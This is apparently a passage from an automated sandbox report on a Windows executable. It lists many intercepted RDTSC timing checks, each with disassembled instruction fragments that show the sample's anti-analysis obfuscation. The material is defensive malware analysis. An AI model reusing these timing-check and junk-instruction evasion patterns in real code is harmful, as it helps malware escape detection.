                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43D787 second address: 43D78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43D78F second address: 43D794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440BE2 second address: 440BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440C4F second address: 440C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440C53 second address: 440C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF093632EDh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440C68 second address: 440C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 441B04 second address: 441B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 441B0A second address: 441B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 441F1B second address: 441F34 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF093632E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jg 00007FBF093632E8h 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 441FC7 second address: 441FCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 441FCD second address: 442022 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FBF093632E8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+1246065Ch] 0x0000002a mov si, A193h 0x0000002e xchg eax, ebx 0x0000002f jmp 00007FBF093632ECh 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push ecx 0x0000003a pop ecx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 442022 second address: 442028 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4424CA second address: 4424CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4424CE second address: 44254B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FBF0920B208h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 movsx esi, ax 0x00000026 push 00000000h 0x00000028 pushad 0x00000029 call 00007FBF0920B219h 0x0000002e xor ebx, dword ptr [ebp+122D2D62h] 0x00000034 pop ecx 0x00000035 sub dword ptr [ebp+122D1E1Eh], ebx 0x0000003b popad 0x0000003c mov esi, dword ptr [ebp+122D2D0Eh] 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ebp 0x00000047 call 00007FBF0920B208h 0x0000004c pop ebp 0x0000004d mov dword ptr [esp+04h], ebp 0x00000051 add dword ptr [esp+04h], 00000015h 0x00000059 inc ebp 0x0000005a push ebp 0x0000005b ret 0x0000005c pop ebp 0x0000005d ret 0x0000005e xchg eax, ebx 0x0000005f push ebx 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44254B second address: 442564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007FBF093632ECh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 442D5F second address: 442D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 443F0F second address: 443F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 444A01 second address: 444A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF0920B20Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 444A10 second address: 444A8B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF093632E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FBF093632F2h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FBF093632E8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov si, CDDDh 0x00000031 push 00000000h 0x00000033 je 00007FBF093632FCh 0x00000039 jmp 00007FBF093632F6h 0x0000003e push 00000000h 0x00000040 jc 00007FBF093632ECh 0x00000046 mov dword ptr [ebp+1245A5FFh], edx 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jc 00007FBF093632ECh 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 444A8B second address: 444A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 444A8F second address: 444AB5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF093632FBh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44531C second address: 445320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44605F second address: 44609F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007FBF093632E6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov dword ptr [ebp+122D1E06h], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FBF093632E8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 push 00000000h 0x00000036 movzx esi, bx 0x00000039 push eax 0x0000003a pushad 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 447333 second address: 447337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 447337 second address: 44733D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4495C4 second address: 4495DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBF0920B206h 0x0000000a pop ebx 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007FBF0920B20Ah 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44733D second address: 447343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44B18E second address: 44B1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FBF0920B208h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jg 00007FBF0920B22Ch 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBF0920B213h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44C36A second address: 44C37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FBF093632E8h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44E457 second address: 44E45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44E45C second address: 44E489 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FBF093632EDh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF093632F5h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44E489 second address: 44E48D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44E48D second address: 44E493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44E493 second address: 44E4E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov di, 74FBh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FBF0920B208h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov ebx, dword ptr [ebp+1246065Ch] 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122DB6CFh], eax 0x00000038 push eax 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c ja 00007FBF0920B206h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44E606 second address: 44E60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44E60B second address: 44E67D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF0920B20Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FBF0920B208h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D1DA3h] 0x0000002d or dword ptr [ebp+122DB710h], eax 0x00000033 push dword ptr fs:[00000000h] 0x0000003a mov edi, dword ptr [ebp+122D2D62h] 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 add edi, dword ptr [ebp+122D2B62h] 0x0000004d mov eax, dword ptr [ebp+122D1109h] 0x00000053 mov edi, 7ABF50FFh 0x00000058 push FFFFFFFFh 0x0000005a mov dword ptr [ebp+122D2ECAh], edx 0x00000060 push eax 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push ecx 0x00000065 pop ecx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44F6D3 second address: 44F6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4503EB second address: 4503F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FBF0920B206h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44F6D7 second address: 44F6DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4503F5 second address: 450478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FBF0920B208h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 movsx edi, bx 0x00000028 push 00000000h 0x0000002a mov edi, 44C051C7h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FBF0920B208h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D1D2Ch], ecx 0x00000051 je 00007FBF0920B208h 0x00000057 mov bh, 43h 0x00000059 xchg eax, esi 0x0000005a jmp 00007FBF0920B217h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 push esi 0x00000064 pop esi 0x00000065 pop esi 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 450478 second address: 450483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FBF093632E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 45236A second address: 452370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 452370 second address: 452374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 3F7A20 second address: 3F7A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jnc 00007FBF0920B212h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 452B52 second address: 452B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4539FB second address: 453A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 454ABD second address: 454B5A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF093632F1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c jne 00007FBF093632E8h 0x00000012 pop ecx 0x00000013 nop 0x00000014 adc di, 879Ch 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov dword ptr [ebp+122D1D1Fh], ecx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007FBF093632E8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 sub ebx, dword ptr [ebp+122D2117h] 0x0000004d mov eax, dword ptr [ebp+122D1329h] 0x00000053 mov ebx, esi 0x00000055 push FFFFFFFFh 0x00000057 jmp 00007FBF093632F7h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FBF093632F8h 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 457770 second address: 457776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 457776 second address: 45777A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 45966C second address: 459670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 459670 second address: 45970C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007FBF093632E8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D227Ch], edx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007FBF093632E8h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D31B5h], ecx 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007FBF093632E8h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 00000017h 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 jmp 00007FBF093632EBh 0x0000006a xchg eax, esi 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FBF093632F5h 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 45970C second address: 459712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 459712 second address: 459728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBF093632EBh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 459728 second address: 45972E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 45A746 second address: 45A74B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 45A74B second address: 45A7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FBF0920B208h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov di, cx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FBF0920B208h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 mov dword ptr [ebp+1247A089h], ebx 0x00000049 push 00000000h 0x0000004b jmp 00007FBF0920B212h 0x00000050 add dword ptr [ebp+122D27D1h], ebx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push esi 0x0000005a push eax 0x0000005b pop eax 0x0000005c pop esi 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 457866 second address: 45786A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 45786A second address: 457870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 457870 second address: 457893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 457893 second address: 457897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 45796E second address: 457978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 457978 second address: 45797C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 455AD0 second address: 455ADA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF093632E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 459843 second address: 45985C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF0920B215h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 45A902 second address: 45A908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 45C8E5 second address: 45C8F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FBF0920B206h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 45C8F6 second address: 45C8FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4604D0 second address: 4604D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 461AEB second address: 461AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 461AEF second address: 461B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FBF0920B21Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 461B11 second address: 461B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632EBh 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FBF093632E6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 461B28 second address: 461B6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF0920B213h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF0920B212h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FBF0920B20Bh 0x0000001b ja 00007FBF0920B206h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 461B6A second address: 461B74 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF093632E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 46870F second address: 468714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
